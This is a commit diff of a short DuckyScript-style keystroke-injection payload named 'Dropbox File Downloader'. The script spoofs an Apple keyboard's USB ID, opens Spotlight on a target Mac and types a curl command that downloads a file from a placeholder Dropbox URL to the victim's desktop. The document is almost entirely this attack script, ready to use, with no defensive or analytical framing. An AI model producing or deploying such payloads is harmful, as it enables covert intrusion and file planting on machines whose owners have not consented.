Dropbox File Downloader.txt
This commit is contained in:
@@ -1,11 +1,14 @@
|
||||
REM Author: Narsty
|
||||
REM Title: Dropbox File Downloader
|
||||
REM Version 1.0 MacOs
|
||||
|
||||
REM Replace <dropbox URL> with the actual URL for the file you want to download.
|
||||
REM Additionally, replace filename with the desired name and extension for the downloaded file.
|
||||
REM the script will download a file to the target MacOs desktop
|
||||
|
||||
|
||||
|
||||
REM Author: Narsty
|
||||
REM Title: Dropbox File Downloader
|
||||
REM Version 1.0 MacOs
|
||||
REM Category: Recon
|
||||
|
||||
ID 05ac:021e Apple:Keyboard
|
||||
DELAY 500
|
||||
GUI SPACE
|
||||
@@ -18,4 +21,4 @@ STRING curl -L -o ~/Desktop/<filename> "<Dropbox URL>"
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 5000
|
||||
ENTER
|
||||
ENTER
|
||||
|
||||
Reference in New Issue
Block a user